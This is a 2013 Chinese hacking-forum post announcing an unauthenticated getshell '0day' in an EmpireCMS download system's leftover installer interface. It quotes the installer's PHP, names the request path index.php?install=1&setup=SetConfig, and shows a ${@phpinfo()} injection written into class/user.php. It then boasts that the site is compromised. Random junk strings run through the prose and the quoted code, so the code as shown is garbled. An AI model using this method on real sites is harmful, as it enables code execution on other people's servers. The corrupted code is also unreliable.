找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2738|回复: 0
打印 上一主题 下一主题

帝国万能接口漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们/ w9 U  M; U  k- u3 z0 ~" [- Z

5 C6 X6 C) s) P5 O/ L# V, |

2 j' k1 G! ^$ c) |" w. H
这是帝国的一套下载系统 如图
/ M4 L2 p$ D' e" o% mps(不需要任何账户和密码,直接写shell)


: m' S8 [1 i0 ]& f, X) d9 l6 z7 ~

由于很多站是由于下载要整合discuz 等等一些论坛....
% V1 c6 h$ N( ^- I, q1 D( t- A9 V* E

4 \: u! f4 \1 [& v$ b

而帝国他又有一个万能接口,如图


( f- m0 f1 j0 ^  B" O. c2 r2 m  h2 G& Q2 B: c9 }4 ~, d
/ h: ~8 N- x, l$ [9 Q

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码) E8 C- m/ U" c* H' \: v
1 ^6 [  q. Z/ ]! H" w
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪, I) s, O0 L- M% O) J

) A5 i8 J& m% }: P# A在data/fun.php中的15行+ _$ v8 D0 E7 o4 S) I5 E
6 P& g; ~/ N" b! h
我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {. s0 }% O7 [; e' S% @: d
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干5 o- v; F" w; T  K6 P
0 @2 E2 h, k6 H6 R* E
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);: B3 [# f- Z! U

) b$ w, ^8 R" ?他将传进来的变量进行了切割,然后赋给了$filetext
# ^# d( @$ U4 L9 l7 \1 {
; ~0 ]/ h. I; ~5 j: a' ~然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了
: K8 u# y: v: u' e# m! g
7 l: i- S$ ^4 u( g* n, b8 ?我们看看写入的结果,随便填一个


4 H& J% N' T" G9 t9 R% i
( Z/ d/ Z. Z$ n$ X
6 u- d5 G2 q$ O! I# Z. Z7 ]: y2 V& W3 w

/ R" c  g# T  n
- y' [/ y1 }5 H9 o. D
* c2 l3 x) z6 @

3 M7 f$ W2 o$ o! G

/ [& p# a8 m9 P7 L' v( H+ \9 \1 P0 f5 x

) W6 o2 \2 |5 t! O
) R3 }9 k& _4 h: r( M0 h- I0 l. r  A% ^$ F- b7 F6 @" g- g; @8 e7 _
  T2 R3 }2 D/ _# s3 c
, ~0 ^% A% E% j* y

  G" G  ?/ Z& o7 n2 g4 P/ u
& G2 `1 E* M, r; E/ e3 E) e9 C# N
+ d; D: G& D! H& C- ^$ m! m" M& A

) V; r+ k: ]5 w8 @# l* l$ d

/ ^" t1 b7 u, }
0 j: B: K3 E9 a0 H

所以我们淫荡点,写个${@phpinfo()}试试


8 f/ r! C" q, f9 l! B

然后访问以下class/user.php这个文件/ b8 H$ w) t0 N% G( W4 p
日了吧

9 G" C+ ~+ i& D7 V1 m# {
/ l  W. v( t- C6 R( t2 U
3 j' e; k3 u5 b- _1 J/ c" p

' {* M8 v- u% n2 {1 W! E* `  _

' m. P! l, {2 ]

/ Z9 s& i8 h( v8 ]. S3 w

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表